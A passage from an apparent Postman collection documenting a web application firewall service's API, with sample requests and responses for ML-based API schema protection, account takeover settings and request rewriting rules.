API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"a065d920-7745-484a-865f-51378c120fe4","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_schemafile","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ml_apiprot_schemafile"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"json\": {\n            \"info\": {\n                \"description\": \"Automatically generated by APID\",\n                \"title\": \"API\",\n                \"version\": \"3.0.3\"\n            },\n            \"openapi\": \"3.0.3\",\n            \"paths\": {\n                \"/api/v2/FTNT_test/FTNT_test_6\": {\n                    \"post\": {\n                        \"parameters\": [\n                            {\n                                \"description\": \"\",\n                                \"in\": \"query\",\n                                \"name\": \"dept\",\n                                \"required\": true,\n                                \"schema\": {\n                                    \"type\": \"string\",\n                                    \"maxLength\": 7,\n                                    \"minLength\": 7\n                                }\n                            },\n                            {\n                                \"description\": \"\",\n                                \"in\": \"query\",\n                                \"name\": \"FTNT_test\",\n                                \"required\": true,\n                                \"schema\": {\n                                    \"type\": \"string\",\n                                    \"maxLength\": 14,\n                                    \"minLength\": 14\n                                }\n                            }\n                        ],\n                        \"requestBody\": {\n                            \"content\": {\n                                \"application/json\": {\n                                    \"schema\": {}\n                                }\n                            },\n                            \"description\": \"request body\"\n                        },\n                        \"responses\": {\n                            \"200\": {\n                                \"content\": {\n                                    \"application/json\": {\n                                        \"schema\": {\n                                            \"type\": \"array\",\n                                            \"items\": {\n                                                \"oneOf\": [\n                                                    {\n                                                        \"type\": \"number\",\n                                                        \"maximum\": 100,\n                                                        \"minimum\": 100\n                                                    }\n                                                ]\n                                            },\n                                            \"maxItems\": 2,\n                                            \"minItems\": 2\n                                        }\n                                    }\n                                },\n                                \"description\": \"response body\"\n                            }\n                        },\n                        \"url_id\": 1\n                    }\n                }\n            },\n            \"servers\": [\n                {\n                    \"description\": \"open api\",\n                    \"url\": \"*\"\n                }\n            ]\n        },\n        \"yaml\": [\n            \"info:\",\n            \"  description: Automatically generated by APID\",\n            \"  title: API\",\n            \"  version: 3.0.3\",\n            \"openapi: 3.0.3\",\n            \"paths:\",\n            \"  /api/v2/FTNT_test/FTNT_test_6:\",\n            \"    post:\",\n            \"      parameters:\",\n            \"      - description: ''\",\n            \"        in: query\",\n            \"        name: dept\",\n            \"        required: true\",\n            \"        schema:\",\n            \"          maxLength: 7\",\n            \"          minLength: 7\",\n            \"          type: string\",\n            \"      - description: ''\",\n            \"        in: query\",\n            \"        name: FTNT_test\",\n            \"        required: true\",\n            \"        schema:\",\n            \"          maxLength: 14\",\n            \"          minLength: 14\",\n            \"          type: string\",\n            \"      requestBody:\",\n            \"        content:\",\n            \"          application/json:\",\n            \"            schema: {}\",\n            \"        description: request body\",\n            \"      responses:\",\n            \"        '200':\",\n            \"          content:\",\n            \"            application/json:\",\n            \"              schema:\",\n            \"                items:\",\n            \"                  oneOf:\",\n            \"                  - maximum: 100\",\n            \"                    minimum: 100\",\n            \"                    type: number\",\n            \"                maxItems: 2\",\n            \"                minItems: 2\",\n            \"                type: array\",\n            \"          description: response body\",\n            \"      url_id: 1\",\n            \"servers:\",\n            \"- description: open api\",\n            \"  url: '*'\"\n        ],\n        \"yaml_str\": \"[\\\"info:\\\", \\\"  description: Automatically generated by APID\\\", \\\"  title: API\\\", \\\"  version: 3.0.3\\\", \\\"openapi: 3.0.3\\\", \\\"paths:\\\", \\\"  /api/v2/FTNT_test/FTNT_test_6:\\\", \\\"    post:\\\", \\\"      parameters:\\\", \\\"      - description: ''\\\", \\\"        in: query\\\", \\\"        name: dept\\\", \\\"        required: true\\\", \\\"        schema:\\\", \\\"          maxLength: 7\\\", \\\"          minLength: 7\\\", \\\"          type: string\\\", \\\"      - description: ''\\\", \\\"        in: query\\\", \\\"        name: FTNT_test\\\", \\\"        required: true\\\", \\\"        schema:\\\", \\\"          maxLength: 14\\\", \\\"          minLength: 14\\\", \\\"          type: string\\\", \\\"      requestBody:\\\", \\\"        content:\\\", \\\"          application/json:\\\", \\\"            schema: {}\\\", \\\"        description: request body\\\", \\\"      responses:\\\", \\\"        '200':\\\", \\\"          content:\\\", \\\"            application/json:\\\", \\\"              schema:\\\", \\\"                items:\\\", \\\"                  oneOf:\\\", \\\"                  - maximum: 100\\\", \\\"                    minimum: 100\\\", \\\"                    type: number\\\", \\\"                maxItems: 2\\\", \\\"                minItems: 2\\\", \\\"                type: array\\\", \\\"          description: response body\\\", \\\"      url_id: 1\\\", \\\"servers:\\\", \\\"- description: open api\\\", \\\"  url: '*'\\\"]\"\n    }\n}"}],"_postman_id":"405f78d2-99bd-49cd-a6b5-2a21c9a62469"},{"name":"Download ML Based API Protection Schema","id":"fa8846f6-c6fa-4b1b-83f0-4831193392a2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_download?type={{type}}&urlmd5={{urlmd5}}","description":"<p>Get the configuration information of JSON protection.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","ml_apiprot_download"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>File format, \"yaml\" or \"json\"</p>\n","type":"text/plain"},"key":"type","value":"{{type}}"},{"description":{"content":"<p>MD5 of selected API path which returned in response of GET URL Path request. If empty, all data is downloaded. There can be multiple values, separated by commas</p>\n","type":"text/plain"},"key":"urlmd5","value":"{{urlmd5}}"}],"variable":[{"id":"71de2702-7de6-4a35-b0d7-7f2142a53122","description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"bb18f558-065e-4b47-b841-59b348a6771d","name":"Download JSON","originalRequest":{"method":"GET","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_download?type=json&urlmd5=B1D340B023A7EA84,DE20241CC4155EEF","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ml_apiprot_download"],"query":[{"key":"type","value":"json","description":"File format, \"yaml\" or \"json\""},{"key":"urlmd5","value":"B1D340B023A7EA84,DE20241CC4155EEF","description":"MD5 of selected API path which returned in response of GET URL Path request. If empty, all data is downloaded. There can be multiple values, separated by commas"}],"variable":[{"id":"71de2702-7de6-4a35-b0d7-7f2142a53122","key":"ep_id","value":"{{ep_id}}","type":"string","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"info\": {\n            \"description\": \"Automatically generated by APID\",\n            \"title\": \"API\",\n            \"version\": \"3.0.3\"\n        },\n        \"openapi\": \"3.0.3\",\n        \"paths\": {\n            \"/api/v2/Amazon/FTNT_test/FTNT_test_6\": {\n                \"post\": {\n                    \"parameters\": [\n                        {\n                            \"description\": \"\",\n                            \"in\": \"query\",\n                            \"name\": \"dept\",\n                            \"required\": true,\n                            \"schema\": {\n                                \"type\": \"string\",\n                                \"maxLength\": 7,\n                                \"minLength\": 7\n                            }\n                        },\n                        {\n                            \"description\": \"\",\n                            \"in\": \"query\",\n                            \"name\": \"FTNT_test\",\n                            \"required\": true,\n                            \"schema\": {\n                                \"type\": \"string\",\n                                \"maxLength\": 14,\n                                \"minLength\": 14\n                            }\n                        }\n                    ],\n                    \"requestBody\": {\n                        \"content\": {\n                            \"application/json\": {\n                                \"schema\": {}\n                            }\n                        },\n                        \"description\": \"request body\"\n                    },\n                    \"responses\": {\n                        \"200\": {\n                            \"content\": {\n                                \"application/json\": {\n                                    \"schema\": {\n                                        \"type\": \"array\",\n                                        \"items\": {\n                                            \"oneOf\": [\n                                                {\n                                                    \"type\": \"number\",\n                                                    \"maximum\": 100,\n                                                    \"minimum\": 100\n                                                }\n                                            ]\n                                        },\n                                        \"maxItems\": 2,\n                                        \"minItems\": 2\n                                    }\n                                }\n                            },\n                            \"description\": \"response body\"\n                        }\n                    }\n                }\n            }\n        },\n        \"servers\": [\n            {\n                \"description\": \"open api\",\n                \"url\": \"*\"\n            }\n        ]\n    }\n}"},{"id":"fd8e1a02-67c5-42c7-ad4e-9dcfa4b3fdc5","name":"Download YAML","originalRequest":{"method":"GET","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_download?type=yaml&urlmd5=B1D340B023A7EA84,DE20241CC4155EEF","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ml_apiprot_download"],"query":[{"key":"type","value":"yaml","description":"File format, \"yaml\" or \"json\""},{"key":"urlmd5","value":"B1D340B023A7EA84,DE20241CC4155EEF","description":"MD5 of selected API path which returned in response of GET URL Path request. If empty, all data is downloaded. There can be multiple values, separated by commas"}],"variable":[{"id":"71de2702-7de6-4a35-b0d7-7f2142a53122","key":"ep_id","value":"{{ep_id}}","type":"string","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": \"info:\\n  description: Automatically generated by APID\\n  title: API\\n  version: 3.0.3\\nopenapi: 3.0.3\\npaths:\\n  /api/v2/Amazon/FTNT_test/FTNT_test_6:\\n    post:\\n      parameters:\\n      - description: ''\\n        in: query\\n        name: dept\\n        required: true\\n        schema:\\n          maxLength: 7\\n          minLength: 7\\n          type: string\\n      - description: ''\\n        in: query\\n        name: FTNT_test\\n        required: true\\n        schema:\\n          maxLength: 14\\n          minLength: 14\\n          type: string\\n      requestBody:\\n        content:\\n          application/json:\\n            schema: {}\\n        description: request body\\n      responses:\\n        '200':\\n          content:\\n            application/json:\\n              schema:\\n                items:\\n                  oneOf:\\n                  - maximum: 100\\n                    minimum: 100\\n                    type: number\\n                maxItems: 2\\n                minItems: 2\\n                type: array\\n          description: response body\\nservers:\\n- description: open api\\n  url: '*'\\n\"\n}"}],"_postman_id":"fa8846f6-c6fa-4b1b-83f0-4831193392a2"},{"name":"Get Account Takeover","id":"f5b3819f-b9d0-48bf-b919-5ccfff3912ce","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/account_takeover","description":"<p>Get the configuration information about account takeover.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","account_takeover"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"e56b739d-04c1-4218-8a2e-c5a5036a304a","name":"Success","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/account_takeover","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","account_takeover"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\", \n    \"result\": {\n        \"_status\": \"enable\", \n        \"session-fixation-protection\": \"disable\", \n        \"credential-stuffing-protection\": \"disable\", \n        \"authentication-url\": \"/\", \n        \"logoff-path\": \"/logout.php\", \n        \"username-parameter\": \"username\", \n        \"session-id-name\": \"sessionid\", \n        \"password-parameter\": \"password\", \n        \"return-code\": \"200\",\n        \"action\": \"alert_deny\",\n        \"template_status\": \"disable\"\n    }\n}"}],"_postman_id":"f5b3819f-b9d0-48bf-b919-5ccfff3912ce"},{"name":"Update Account Takeover","id":"33787457-6770-4375-84b6-934d2b063166","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"description":"<p>token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"    \"_status\": \"enable\",\n    \"authentication-url\": \"/\",\n    \"logoff-path\": \"/logout.php\",\n    \"username-parameter\": \"username\",\n    \"password-parameter\": \"password\",\n    \"session-id-name\": \"sessionid\",\n    \"session-fixation-protection\": \"enable\",\n    \"return-code\": \"400\",\n    \"response-body\": \"500\",\n    \"redirect-url\": \"600\",\n    \"action\": \"alert\",\n    \"credential-based-brute-force\": \"enable\"\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/account_takeover","description":"<p>Update the configuration information of account takeover.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"_status\": {\n            \"description\": \"Configure to enable or disable account takeover\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"template_status\": {\n            \"description\": \"Configure to enable or disable the module's template status\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"authentication-url\": {\n            \"description\": \"The URL to match in authorization requests. It should begin with a forward slash '/'\",\n            \"type\": \"string\",\n            \"default\": \"/\"\n        },\n        \"logoff-path\": {\n            \"description\": \"The URL of the request that a client sends to log out of the application. It should begin with a forward slash '/'\",\n            \"type\": \"string\"\n        },\n        \"username-parameter\": {\n            \"description\": \"The username to match in authorization requests\",\n            \"type\": \"string\"\n        },\n        \"password-parameter\": {\n            \"description\": \"The password to match in authorization requests\",\n            \"type\": \"string\"\n        },\n        \"session-id-name\": {\n            \"description\": \"The name of the session ID that is used to identify each session\",\n            \"type\": \"string\"\n        },\n        \"return-code\": {\n            \"description\": \"The value of the return code if the authentication is successful. It is a regular expression\",\n            \"type\": \"string\"\n        },\n        \"response-body\": {\n            \"description\": \"The response body if the authentication is successful. It is a regular expression\",\n            \"type\": \"string\"\n        },\n        \"redirect-url\": {\n            \"description\": \"The redirect URL if the authentication is successful. It is a regular expression\",\n            \"type\": \"string\"\n        },\n        \"session-fixation-protection\": {\n            \"description\": \"Configure to enable or not to erase session IDs from the cookie and argument fields of a matching login request, so that attackers can't steal the session ID and then trick the user to authenticate on a forged web page\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"credential-stuffing-protection\": {\n            \"description\": \"Configure to enable or not to use Credential Stuffing Defense database to prevent against Credential Stuffing attacks\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"action\": {\n            \"description\": \"Select the action that TIM Host Protection takes against requests with the ID of a timed-out session during the specified time period or if the paired username/password is found in Credential Stuffing Defense database.\",\n            \"type\": \"string\",\n            \"required\": [\"_status\", \"authentication-url\", \"username-parameter\", \"password-parameter\", \"session-id-name\", \"session-fixation-protection\", \"action\"],\n            \"enum\": [\n                \"alert\",\n                \"alert_deny\",\n                \"deny_no_log\"\n            ],\n            \"default\": \"alert_deny\"\n        }\n        \n    }\n}\n\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","account_takeover"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"dfd83e70-a151-44b7-b26d-c2bc5cc313be","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","description":"token","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"authentication-url\": \"/\",\n    \"logoff-path\": \"/logout.php\",\n    \"username-parameter\": \"username\",\n    \"password-parameter\": \"password\",\n    \"session-id-name\": \"sessionid\",\n    \"session-fixation-protection\": \"enable\",\n    \"return-code\": \"400\",\n    \"response-body\": \"500\",\n    \"redirect-url\": \"600\",\n    \"action\": \"alert\",\n    \"credential-based-brute-force\": \"enable\"\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/account_takeover","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","account_takeover"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\"detail\": \"successfully\"}"},{"id":"e0c0a195-8370-4ea1-880d-0d27ef83cdda","name":"Parameter Invalid","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","description":"token","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"authentication-url\": \"/\",\n    \"logoff-path\": \"/logout.php\",\n    \"username-parameter\": \"username#\",\n    \"password-parameter\": \"password\",\n    \"session-id-name\": \"sessionid\",\n    \"session-fixation-protection\": \"enable\",\n    \"return-code\": \"400\",\n    \"response-body\": \"500\",\n    \"redirect-url\": \"600\",\n    \"action\": \"alert\",\n    \"credential-based-brute-force\": \"enable\"\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/account_takeover","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","account_takeover"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'username-parameter': 'sepcial char not allowed input #'}\"\n}"}],"_postman_id":"33787457-6770-4375-84b6-934d2b063166"},{"name":"Get Rewriting Requests","id":"ede669ab-d9a2-4b23-929d-8904d63f3444","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/rewritingrequests","description":"<p>Get the configuration information of the Rewriting Requests.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","rewritingrequests"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"00c6dc7f-c58a-423f-9c0e-1159ab561f7f","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/rewritingrequests","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","rewritingrequests"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint ID."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 07:38:29 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"215"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"ebec4f97-7df6-11e9-baa6-6f9c87ddbb6b"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLXaNEuqIAMFXeg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce79f74-6f68ae5c7a1ac81c267b7c70;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"disable\",\n        \"XForwardedFor\": {\n            \"x-real-ip\": \"disable\",\n            \"x-forwarded-for-support\": \"enable\",\n            \"add-source-port\": \"enable\",\n            \"x-forwarded-port\": \"enable\",\n            \"identify-original-ip\": \"enable\",\n            \"original-ip-header\": \"X-Forwarded-For\"\n        },\n        \"UrlRewritePolicy\": {\n            \"rule\": []\n        }\n    }\n}"}],"_postman_id":"ede669ab-d9a2-4b23-929d-8904d63f3444"},{"name":"Update Rewriting Requests","id":"86186c02-b9f8-4b10-8af9-fcf0e73472d0","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"description":"<p>Token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"XForwardedFor\": {\n        \"x-real-ip\": \"enable\",\n        \"x-forwarded-for-support\": \"enable\",\n        \"add-source-port\": \"enable\",\n        \"x-forwarded-port\": \"enable\",\n        \"identify-original-ip\": \"enable\",\n        \"original-ip-header\": \"X-Forwarded-For\"\n    },\n    \"UrlRewritePolicy\": {\n        \"rule\": [\n            {\n                \"action\": \"rewrite-host\",\n                \"name\": \"rewrite-host\",\n                \"rewrite-from\": \"zzz.com\",\n                \"rewrite-to\": \"rr.com\",\n                \"seq\": \"1\"\n            },\n            {\n                \"action\": \"rewrite-url\",\n                \"name\": \"reurl\",\n                \"rewrite-from\": \"/test\",\n                \"rewrite-to\": \"/admin\",\n                \"seq\": \"2\"\n            }\n        ]\n    }\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/rewritingrequests","description":"<p>Update the information about the Rewriting Requests.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n{\n    \"type\": \"object\",\n    \"properties\": {\n        \"_status\": {\n            \"description\": \"Configure to enable or disable rewriting requests\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"XForwardedFor\": {\n            \"type\": \"object\",\n            \"required\": [\"x-real-ip\", \"x-forwarded-for-support\"],\n            \"properties\": {\n                \"x-real-ip\": {\n                    \"description\": \"Configure to include the X-Real-IP: HTTP header on requests forwarded to your web servers\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"enable\",\n                        \"disable\"\n                    ],\n                    \"default\": \"disable\"\n                },\n                \"x-forwarded-for-support\": {\n                    \"description\": \"Configure to include the X-Forwarded-For: HTTP header in requests forwarded to your web servers\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"enable\",\n                        \"disable\"\n                    ],\n                    \"default\": \"enable\"\n                },\n                \"add-source-port\": {\n                    \"description\": \"When enabled, the source port of the original client request will be added to the X-Forwarded-For: header\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"enable\",\n                        \"disable\"\n                    ],\n                    \"default\": \"disable\"\n                },\n                \"x-forwarded-port\": {\n                    \"description\": \"Enable to add an X-Forwarded-Port: header with the destination port that the client originally used\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"enable\",\n                        \"disable\"\n                    ],\n                    \"default\": \"disable\"\n                },\n                \"identify-original-ip\": {\n                    \"description\": \"Whether to track the original IP\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"enable\",\n                        \"disable\"\n                    ],\n                    \"default\": \"enable\"\n                },\n                \"original-ip-header\": {\n                    \"description\": \"Configure the field for indentifying the source IP\",\n                    \"type\": \"string\"\n                }\n               \n            }\n        },\n        \"UrlRewritePolicy\": {\n            \"type\": \"object\",\n            \"properties\": {\n                \"rule\": {\n                    \"type\": \"array\",\n                    \"items\": {\n                        \"type\": \"object\",\n                        \"properties\": {\n                            \"seq\": {\n                                \"type\": \"integer\",\n                            },\n                            \"action\": {\n                               \"description\": \"Select the item that this rule will rewrite HTTP requests from clients or HTTP responses from the web server\",\n                                \"type\": \"string\",\n                                \"enum\": [\n                                    \"rewrite-host\",\n                                    \"rewrite-url\",\n                                    \"rewrite-refer\",\n                                    \"insert-header\",\n                                    \"redirect-301\",\n                                    \"redirect-host\"]\n                            },\n                            \"rewrite-from\":  {\n                               \"description\": \"Configure to define the source where the HTTP requests will be written from\",\n                                \"type\": \"string\",\n                                \"pattern\": \".*\",\n                                \"maxLength\": 255,\n                            },\n                            \"rewrite-to\": {\n                               \"description\": \"Configure to define the source where the HTTP requests will be written to\",\n                                \"type\": \"string\",\n                                \"maxLength\": 255\n                            },\n                            \"header-name\": {\n                               \"description\": \"The name of the header field that you want to insert to a request\",\n                                \"pattern\": \"[^#()&lt;&gt;? '\\\\']*\",\n                                \"maxLength \": 255\n                            },\n                            \"header-value \": {\n                               \"description\": \"The value of the header field\",\n                                \"type\": \"string\",\n                                \"pattern\": \"[ ^ #()&lt;&gt; ?'\\\\']*\",\n                                \"maxLength\": 255\n                            },\n                            \"url-translation\": {\n                              \"description\": \"Enable it to keep the URL path while redirecting clients to a new host or IP address in a '301 Permanently' respons. Only valid when action is 'redirect-host'\",\n                              \"type\": \"string\",\n                              \"enum\": [\"enable\", \"disable\"],\n                              \"default\": \"disable\"\n                            },\n                    }\n                }\n            }\n        }\n    }\n  }\n}\n\n\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","rewritingrequests"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"3b237892-7c16-4dc9-8571-ed6a921938c5","name":"Success","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"XForwardedFor\": {\n        \"x-real-ip\": \"enable\",\n        \"x-forwarded-for-support\": \"enable\",\n        \"identify-original-ip\": \"enable\",\n        \"original-ip-header\": \"X-Forwarded-For\"\n    },\n    \"UrlRewritePolicy\": {\n        \"rule\": [\n            {\n                \"action\": \"rewrite-host\",\n                \"name\": \"rewrite-host\",\n                \"rewrite-from\": \"zzz.com\",\n                \"rewrite-to\": \"rr.com\",\n                \"seq\": \"1\"\n            },\n            {\n                \"action\": \"rewrite-url\",\n                \"name\": \"reurl\",\n                \"rewrite-from\": \"/test\",\n                \"rewrite-to\": \"/admin\",\n                \"seq\": \"2\"\n            }\n        ]\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/rewritingrequests","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","rewritingrequests"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint ID."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 07:48:27 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"5069e7ff-7df8-11e9-9664-d79493874dc7"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLY3pHVQIAMFpog="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce7a1ca-f5d6f81e79ce309773dd6baf;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"ad6fce04-d932-4a5b-b040-54900c29bf28","name":"Fail","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"XForwardedFor\": {\n        \"x-real-ip\": \"enable\",\n        \"x-forwarded-for-support\": \"enable\",\n        \"identify-original-ip\": \"enable\",\n        \"original-ip-header\": \"X-Forwarded-For\"\n    },\n    \"UrlRewritePolicy\": {\n        \"rule\": [\n            {\n                \"action\": \"rewrite-host\",\n                \"name\": \"rewrite-host\",\n                \"rewrite-from\": \"zzz.com\",\n                \"rewrite-to\": \"rr.com\",\n                \"seq\": \"1\"\n            },\n   